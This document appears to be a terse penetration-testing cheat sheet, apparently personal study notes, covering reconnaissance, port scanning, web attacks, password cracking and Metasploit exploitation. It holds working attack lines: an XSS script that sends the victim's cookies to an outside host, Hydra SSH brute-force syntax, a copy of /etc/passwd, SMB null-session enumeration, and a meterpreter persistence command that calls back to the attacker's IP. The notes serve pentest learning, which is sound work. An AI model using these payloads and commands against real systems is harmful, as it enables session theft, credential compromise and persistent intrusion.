Wireshark - Follow TCP Stream
Wireshark - Follow TCP Stream
Wireshark - Follow TCP Stream
route commands
route
ip route ---linux
netstat -r
mac address
ifconfig/all ----windows
ifconfig ---*nix
ARP
arp -a ---windows
arp ---*nix
ip neigbour – linux
TCPView tool
DNS
ping
Dataexfil
PAcketwhisper
egresscheckframework
Pentest
OS fingerpriniting
Port scan
Service
vulnerability scan
exploitation
info gather
crunch base
sam.gov
gsa elibrary
whois ---linux
subdamain enum:
crt dot sh
sublist3r -d domain
Foot printing
ping
OS fingerprint
p0f
Port Scanning
MASSCAN
masscan -p xxx -Pn --rate=xpacets/sec --banners IPS -e tap0 --router-ip x.x.x.x(USED BECAUSE we are
connected via vpn)
NESSUS
/etc/init.d/nessusd start
https://localhost:8834
Host: 12.34.56.78
PUT /path HTTP/1.x
Host: 1.2.3.4
Content-type: text/html
Content-length: 20 ------- have to know file size for PUT ---- wc -m payload.ext
Headers\r\n
\r\n
Message \r\n
burpsuite
Devtools f12
Httprint -P0 -h target.IP -s <sig file (/usr/share/httprint/signatures.txt)> ----- identify web servers based
on signs |||-P0 no ping
Dirbuster
/usr/share/dirbuster/wordlists
DIRB
use dbname;
show tables;
select * from tables;
XSS
<script>
i.src="http://192.168.99.11/get.php?cookies="+document.cookie;
</script>
SQLI
Password cracking
wordlist /usr/share/seclists/Passwords
Hashcat
-m hashtype
-a attackmode
-o outputfile
-b initial benchmarking
-d specifies device to use
-O optimize performance
Ophcrack
Hydra
hydra -L logins.txt -P pws.txt -M targets.txt ssh
Ssh target
scp root@192.168.99.22:/etc/passwd .
Windows Shares
\\comp\c$
\\comp\admin$ ipc$
NULL Sessions
first check if file sharing service is running
>domain
smbclient -L //192.168.174.132 -N
Automate all of the above with emun for windows and enum4linux for linux
ARPSPOOF
Use exploit
Set x
Show payloads
Set PAYLOAD x
Set options
Exploit
meterpreter
pivoting
ipconfig – check victims subnet
route add 192.x.x.x/24 sessions(1,2)
run persistence -X -i 10 -p 5555 kaliip